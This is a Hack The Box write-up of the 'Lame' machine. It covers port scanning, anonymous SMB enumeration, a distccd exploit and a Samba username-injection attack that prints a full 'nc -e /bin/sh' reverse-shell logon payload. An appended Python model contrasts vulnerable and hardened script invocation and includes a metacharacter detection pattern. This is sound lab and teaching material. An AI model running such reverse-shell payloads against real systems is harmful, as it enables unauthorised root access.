This is the first machine of the Hack The Box Beginner Track: “LAME”.
The box is tagged “injection”, “CMS exploit”, “Linux”, “Web”, “PHP” and “Password Reuse”.
We start with `sudo nmap -sC -sV <IP>` and find four open ports: 21, 22, 139 and 445. The FTP server on port 21 allows anonymous login, so let's try that first to catch the low-hanging fruit. Meanwhile we can run an nmap full port scan (`-p-`), which returns a fifth open port on 3632 (distccd v1).
The FTP server does not appear to contain any files, and it is also not possible to upload files from our side (error `553 Could not create file.`).
Next, let's enumerate the SMB service, which allows anonymous login as well.
We see a share "tmp" which might be accessible. We can view the share's files with smbclient. From the folder we can download two files, one of them `.X0-lock`; the rest is not accessible with our anonymous account. We try the same with the `opt` share, but this one does not let us in anonymously.
Of the two files, one shows some log data of "VGAuthService" and the `.X0-lock` file contains a single number: 5703.
I'm not sure how to use these ones, so let's check out the last open port with the `distccd` service.
After downloading and running the GitHub exploit, I received a shell (note that it needs to be run with python2 and not python3). We end up as user `daemon` in the `/tmp` directory, to which we already had access via smbclient.
On the machine, we find four users in the home directory: ftp, makis, service and user. In the home directory of `makis`, we find the user flag.
Since the `daemon` user has a shell, I tried to create SSH keys, but unfortunately the user's home directory (`/usr/sbin:/bin/sh`) is not writable. But we can put files into the tmp share via smbclient. So let's upload the linpeas script and run it for enumeration.
After I finished the box, I watched a YouTube walkthrough and learned that there was an even simpler way to get root access directly: we can get RCE directly via the SMB server without any steps in between.
The bug in this SMB server version is that we can inject arbitrary commands into the username field while attempting an SMB connection. Inside smbclient, this is all we need to type: `logon "./=`nohup nc -e /bin/sh 10.10.16.28 4444`"`. With this, we get root access.
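To show from the defender's side why a logon name like the one above ends up executed, here is an added Python model (not Samba's code and not from the original post) of a username map script being invoked with the logon name: the vulnerable variant splices the name into a shell command line, the hardened variant passes it as a single argv element without a shell and rejects names carrying shell metacharacters. The script name `echo` and the sample logon name are constructed assumptions; the inner command is a harmless echo.

```python
import re
import subprocess

# Characters a POSIX shell would interpret; none belong in a logon name.
SHELL_META = re.compile(r"[`$;|&<>\n]")


def is_suspicious_logon_name(name: str) -> bool:
    """True when the logon name contains shell metacharacters (detection hook)."""
    return SHELL_META.search(name) is not None


def run_map_script_vulnerable(script: str, name: str) -> str:
    """Flawed pattern (constructed model): the name is spliced into a command
    string that /bin/sh -c then parses, so backticks inside it are executed."""
    cmd = f"{script} {name}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout.strip()


def run_map_script_noshell(script: str, name: str) -> str:
    """Hardened: the name is one argv element and no shell is involved,
    so metacharacters reach the script as literal bytes."""
    return subprocess.run([script, name], capture_output=True, text=True).stdout.strip()


def run_map_script_hardened(script: str, name: str) -> str:
    """Defence in depth: reject suspicious names before invoking anything."""
    if is_suspicious_logon_name(name):
        raise ValueError(f"rejected logon name: {name!r}")
    return run_map_script_noshell(script, name)


if __name__ == "__main__":
    # Constructed sample with the same shape as the payload above, but the
    # substituted command is a harmless echo so the demo is safe to run.
    sample = "./=`echo injected`"
    print("vulnerable:", run_map_script_vulnerable("echo", sample))  # ./=injected
    print("no shell  :", run_map_script_noshell("echo", sample))     # ./=`echo injected`
    print("flagged   :", is_suspicious_logon_name(sample))          # True
```

The first call shows the backticks being evaluated by the shell; the second shows the same name arriving at the script untouched once no shell sits in between.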